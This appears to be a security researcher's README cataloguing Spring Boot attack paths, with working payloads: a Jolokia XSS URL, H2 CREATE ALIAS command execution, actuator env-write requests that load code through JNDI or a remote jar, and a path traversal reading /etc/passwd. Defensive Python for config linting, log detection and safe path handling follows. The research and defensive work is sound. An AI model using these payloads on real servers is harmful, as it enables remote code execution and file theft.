# Spring Boot Vulnerability (Keep On Updating)

### 0x01 Spring Boot Actuator Exposed

Actuator endpoints allow you to monitor and interact with your Spring application. Spring Boot includes a number of built-in endpoints and you can also add your own. For example, the health endpoint provides basic application health information. The following endpoints are available:

* ##### /autoconfig - Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied.
* ##### /beans - Displays a complete list of all the Spring beans in your application.
* ##### /configprops - Displays a collated list of all @ConfigurationProperties.
* ##### /dump - Performs a thread dump.
* ##### /heapdump - JVM heap dump information. It is actually a binary file; you can use the tool ``MemoryAnalyzer`` to analyze it. Sometimes this file contains ``PASSWORD / ACCESS_KEY / COOKIES / ACCESS_TOKEN`` or other sensitive information.
* ##### /env - Exposes properties from Spring's ConfigurableEnvironment.
* ##### /health - Shows application health information (a simple 'status' when accessed over an unauthenticated connection or full message details when authenticated).
* ##### /info - Displays arbitrary application info.
* ##### /metrics - Shows 'metrics' information for the current application.
* ##### /mappings - Displays a collated list of all @RequestMapping paths.
* ##### /shutdown - Allows the application to be gracefully shut down (not enabled by default).
* ##### /pause - Allows the application to be gracefully paused (not enabled by default).
* ##### /resume - Allows the application to be gracefully resumed (not enabled by default).
* ##### /trace - Displays trace information (by default the last few HTTP requests).

### 0x02 Spring Boot RCE/XSS involving Jolokia

#### 0x001 Jolokia RCE

#### 0x002 Jolokia XSS, fixed since Jolokia ``1.5.0`` (CVE-2018-1000129)

pom.xml

```
<dependency>
    <groupId>org.jolokia</groupId>
    <artifactId>jolokia-core</artifactId>
    <version>1.4.0</version>
</dependency>
```

When visiting the URL ``http://127.0.0.1:10090/actuator/jolokia/read%3Csvg%20onload=alert('xss')%3E?mimeType=text/html``, the XSS triggers.

### 0x03 Spring Boot RCE involving H2 Database JNDI Injection

pom.xml

```
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-data-jpa</artifactId>
    <version>2.2.6.RELEASE</version>
</dependency>

<dependency>
    <groupId>com.h2database</groupId>
    <artifactId>h2</artifactId>
    <scope>runtime</scope>
    <version>1.4.2</version>
</dependency>
```

application.properties

```
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
```

You can visit ``/actuator/env`` to make sure the ``H2 Console`` is enabled.

##### Example 1: Execute ``open -a Calculator`` Command

### 0x04 Spring Boot RCE involving H2 Database ``ALIAS`` Command

##### Example 1: Execute ``id`` Command

```
CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;

CALL EXECMD('id')
```

##### Example 2: Execute ``open -a Calculator`` Command

```
CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$;

CALL EXECMD('open -a Calculator');
```

### 0x05 Spring Boot RCE involving JMX enabled

When visiting the URL ``http://127.0.0.1:10090/actuator/env/spring.jmx.enabled``, you will find that JMX is enabled.

##### Example 1: Execute ``open -a Calculator`` Command

### 0x06 Spring Boot RCE involving H2 Database

#### 0x001 Remote Code Execution via ``spring.datasource.hikari.connection-test-query`` or ``spring.datasource.hikari.connection-init-sql``

##### Example 1: ``spring.datasource.hikari.connection-init-sql``

Step 1:

```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 280

{"sourceType": "com.zaxxer.hikari.HikariDataSource","name":"spring.datasource.hikari.connection-init-sql","value":"CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$;CALL EXECMD('open -a Calculator');"}
```

Step 2:

```
POST /actuator/restart HTTP/1.1
```

#### 0x002 JNDI Injection

Step 1:

```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6
Connection: close
Content-Length: 320

{
"name": "spring.datasource.hikari.connection-init-sql",
"value": "CREATE ALIAS jndi AS $$ import javax.naming.InitialContext;@CODE String jndi(String url) throws Exception {new InitialContext().lookup(url);return null;}$$;CALL jndi('ldap://127.0.0.1:1389/evilObject');"
}
```

Step 2:

```
POST /actuator/restart HTTP/1.1
```

#### 0x003 URL Classloader

Step 1:

```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6
Connection: close
Content-Length: 320

{
"name": "spring.datasource.hikari.connection-init-sql",
"value": "CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName (\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$;CALL remoteUrl()"
}
```

Step 2:

```
POST /actuator/restart HTTP/1.1
```

### 0x07 Spring Boot RCE involving MyBatis (CVE-2020-26945)

### 0x08 Spring Boot Actuator Logview Directory Traversal (CVE-2021-21234)

![image](https://user-images.githubusercontent.com/41412951/137893950-bf279b64-78aa-485e-8c2b-bd7668fae2d5.png)

#### Set Breakpoint At ``securityCheck()``

![image](https://user-images.githubusercontent.com/41412951/137893019-8cdca05b-b189-40ce-87ce-c1a62455e666.png)

![image](https://user-images.githubusercontent.com/41412951/137891437-a85f24ce-2635-47c5-8eae-bba7f75f56ff.png)

#### Construct Directory Traversal Request URL

``http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../``

#### Step Into

![image](https://user-images.githubusercontent.com/41412951/137891730-32a996d1-176c-4be9-8b44-29eac6e09850.png)

#### Step Into

``spring.log/../../../../../`` is taken as the folder, and ``/etc/passwd`` is the file we want.

![image](https://user-images.githubusercontent.com/41412951/137891802-09682c91-e66d-4ff5-8c7f-9d5f9ce2f68b.png)

#### Step Into

In toFile(), the folder ``spring.log/../../../../../`` and the file ``/etc/passwd`` are concatenated into a path without ``securityCheck()``.

![image](https://user-images.githubusercontent.com/41412951/137892318-8128b2a9-bcf6-44f2-afda-3bfbcdc7dea5.png)

#### Retrieve the content of file ``/etc/passwd``

![image](https://user-images.githubusercontent.com/41412951/137893203-1f365483-5c96-4577-82b2-dec631bbc711.png)

### 0x09 Spring Boot Log4j2 JNDI Injection
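The settings that 0x01, 0x03 and 0x05 depend on (actuator exposure, the H2 web console and ``spring.jmx.enabled``) are plain ``application.properties`` keys, so the cheapest control is to lint the configuration before it ships. The script below is an added example and is not code from this repository: it parses a properties file and reports every setting that opens one of the paths above, with a constructed risky configuration beside a hardened one. The Spring Boot keys it recognises (``management.endpoints.web.exposure.include``, ``management.endpoint.<id>.enabled``, and ``management.security.enabled`` on the 1.x line) are real properties; the sample values are made up for the example.

```python
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]  # (property key, offending value, why it matters)

# Actuator endpoints from 0x01 that leak secrets or change runtime state.
# "*" means every endpoint, which is the worst case.
SENSITIVE_ENDPOINTS = {"*", "env", "heapdump", "jolokia", "restart", "shutdown",
                       "trace", "dump", "beans", "configprops", "mappings"}


def parse_properties(text: str) -> Dict[str, str]:
    """Parse the subset of .properties syntax Spring Boot config files use."""
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"^([^=:\s]+)\s*[=:]?\s*(.*)$", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def lint_properties(text: str) -> List[Finding]:
    """Return one finding per setting that enables an attack path from the write-up."""
    props = parse_properties(text)
    findings: List[Finding] = []

    def is_true(key: str) -> bool:
        return props.get(key, "").strip().lower() == "true"

    # 0x01 (Spring Boot 2.x): endpoints listed here are reachable over HTTP.
    include_key = "management.endpoints.web.exposure.include"
    exposed = {e.strip() for e in props.get(include_key, "").split(",") if e.strip()}
    for endpoint in sorted(exposed & SENSITIVE_ENDPOINTS):
        findings.append((include_key, endpoint,
                         "sensitive actuator endpoint reachable over HTTP"))

    # 0x01 (Spring Boot 1.x): this single switch removes auth from all endpoints.
    if props.get("management.security.enabled", "").strip().lower() == "false":
        findings.append(("management.security.enabled", "false",
                         "actuator endpoints served without authentication"))

    # 0x06 needs /actuator/restart; /shutdown is the 0x01 equivalent. Both are
    # off by default and only matter when explicitly enabled.
    for key in props:
        if re.fullmatch(r"(management\.endpoint|endpoints)\.(restart|shutdown)\.enabled", key) and is_true(key):
            findings.append((key, "true", "state-changing endpoint enabled"))

    # 0x03 / 0x04: the H2 web console executes arbitrary SQL, CREATE ALIAS included.
    if is_true("spring.h2.console.enabled"):
        findings.append(("spring.h2.console.enabled", "true", "H2 web console reachable"))
    if is_true("spring.h2.console.settings.web-allow-others"):
        findings.append(("spring.h2.console.settings.web-allow-others", "true",
                         "H2 console accepts non-local clients"))

    # 0x05: JMX MBeans become reachable through Jolokia / the actuator.
    if is_true("spring.jmx.enabled"):
        findings.append(("spring.jmx.enabled", "true", "JMX enabled"))

    return findings


# Constructed sample: roughly the settings the sections above rely on.
RISKY_PROPERTIES = """\
server.port=10090
management.endpoints.web.exposure.include=*
management.endpoint.restart.enabled=true
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
spring.jmx.enabled=true
"""

# Constructed sample: the same application with each of those settings closed.
HARDENED_PROPERTIES = """\
server.port=10090
management.endpoints.web.exposure.include=health,info
management.endpoint.restart.enabled=false
spring.h2.console.enabled=false
spring.jmx.enabled=false
"""

if __name__ == "__main__":
    for key, value, why in lint_properties(RISKY_PROPERTIES):
        print(f"{key}={value}: {why}")
    print("hardened findings:", lint_properties(HARDENED_PROPERTIES))
```

Run it against the real ``application.properties`` in CI; profile-specific files (``application-prod.properties``) need the same pass, since a hardened default file is easily overridden by a profile.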
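Every chain in 0x06 needs two requests a normal client never sends: a ``POST`` to ``/actuator/env`` followed by a ``POST`` to ``/actuator/restart``. That sequence is a reliable detection anchor. The script below is an added example, not code from this repository: it runs over constructed access-log lines in Common Log Format, flags the sensitive actuator and traversal requests that appear on this page, and correlates an env write with a restart from the same client inside a short window. The log format, paths and client addresses are assumptions about the deployment.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line: str) -> Optional[Dict]:
    """Parse one access-log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["target"] = unquote(rec["target"])  # decode %2e%2e, %3C, ... before matching
    return rec


def classify(rec: Dict) -> Optional[str]:
    """Map a request to the section of the write-up it resembles, or None if benign."""
    path = rec["target"].split("?", 1)[0].rstrip("/")
    if rec["method"] == "POST" and path.startswith("/actuator/env"):
        return "runtime property write via POST /actuator/env (0x06)"
    if path.endswith(("/restart", "/shutdown")):
        return "state-changing actuator endpoint (0x01, 0x06)"
    if path.endswith("/heapdump"):
        return "heap dump download, may contain credentials (0x01)"
    if "/jolokia" in path:
        return "Jolokia endpoint accessed (0x02)"
    if ".." in rec["target"]:
        return "path traversal pattern in request (0x08)"
    return None


def triage(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, decoded target, reason) for every suspicious request."""
    out = []
    for rec in filter(None, map(parse_line, lines)):
        reason = classify(rec)
        if reason:
            out.append((rec["ip"], rec["target"], reason))
    return out


def env_then_restart(lines: List[str],
                     window: timedelta = timedelta(minutes=5)) -> List[Tuple[str, datetime, datetime]]:
    """Correlate POST /actuator/env with a later POST /actuator/restart from the same client."""
    recs = sorted(filter(None, map(parse_line, lines)), key=lambda r: r["ts"])
    last_env_post: Dict[str, datetime] = {}
    hits = []
    for r in recs:
        path = r["target"].split("?", 1)[0].rstrip("/")
        if r["method"] == "POST" and path == "/actuator/env":
            last_env_post[r["ip"]] = r["ts"]
        elif r["method"] == "POST" and path == "/actuator/restart":
            seen = last_env_post.get(r["ip"])
            if seen is not None and r["ts"] - seen <= window:
                hits.append((r["ip"], seen, r["ts"]))
    return hits


# Constructed sample log (not real traffic); the paths follow the sections above.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Oct/2021:10:00:01 +0000] "GET /actuator/health HTTP/1.1" 200 15',
    '10.0.0.5 - - [21/Oct/2021:10:00:07 +0000] "POST /actuator/env HTTP/1.1" 200 0',
    '10.0.0.5 - - [21/Oct/2021:10:00:09 +0000] "POST /actuator/restart HTTP/1.1" 200 22',
    '10.0.0.9 - - [21/Oct/2021:10:05:00 +0000] "GET /actuator/heapdump HTTP/1.1" 200 58123456',
    '10.0.0.9 - - [21/Oct/2021:10:06:00 +0000] "GET /actuator/jolokia/read%3Csvg%20onload=alert(1)%3E?mimeType=text/html HTTP/1.1" 200 300',
    '10.0.0.7 - - [21/Oct/2021:10:07:00 +0000] "GET /manage/log/view?filename=/etc/passwd&base=../../../../../ HTTP/1.1" 200 2048',
    'not a log line',
]

if __name__ == "__main__":
    for ip, target, reason in triage(SAMPLE_LOG):
        print(f"{ip} {target}: {reason}")
    for ip, t_env, t_restart in env_then_restart(SAMPLE_LOG):
        print(f"ALERT {ip}: env write at {t_env:%H:%M:%S}, restart at {t_restart:%H:%M:%S}")
```

The single-request rules are cheap but noisy (an operator legitimately pulling a heap dump looks the same); the env-then-restart correlation is the high-confidence signal, because that pair is exactly what the ``connection-init-sql`` chain requires and has no routine equivalent.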
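The 0x08 bug is a missing containment check: ``securityCheck()`` inspects the file name, while ``toFile()`` builds the final path from the unchecked ``base`` folder. The Python below is an added example and not the logview project's code; it reproduces that naive pattern beside a hardened resolver that canonicalises the joined path and requires it to stay under the log root. ``LOG_ROOT`` and the sample parameters are constructed.

```python
import os
from typing import Optional

# Constructed log directory for the example; the real location comes from application config.
LOG_ROOT = "/srv/app-logs"


def naive_security_check(filename: str) -> bool:
    """The weak check from 0x08 in miniature: it only looks at the file name."""
    return ".." not in filename


def naive_log_path(root: str, base: str, filename: str) -> Optional[str]:
    """Vulnerable pattern. `base` is never checked, and os.path.join drops every
    component before an absolute one, so filename=/etc/passwd wins outright."""
    if not naive_security_check(filename):
        return None
    return os.path.normpath(os.path.join(root, base, filename))


def safe_log_path(root: str, base: str, filename: str) -> Optional[str]:
    """Hardened resolver: canonicalise the joined path and keep it under root.

    commonpath (not a string-prefix test) is used so that a sibling such as
    /srv/app-logs-old is rejected as well; realpath also folds symlinks."""
    if not filename or os.path.isabs(base) or os.path.isabs(filename):
        return None  # absolute parameters are never legitimate for this endpoint
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, base, filename))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None  # escaped the log directory via .. or a symlink
    return candidate


if __name__ == "__main__":
    # The folder and file from the 0x08 request.
    attack = ("spring.log/../../../../../", "/etc/passwd")
    print("naive :", naive_log_path(LOG_ROOT, *attack))
    print("safe  :", safe_log_path(LOG_ROOT, *attack))
    print("legit :", safe_log_path(LOG_ROOT, "", "spring.log"))
```

The important design point is that the check runs on the fully joined and canonicalised path, after every parameter has been applied, rather than on one parameter in isolation.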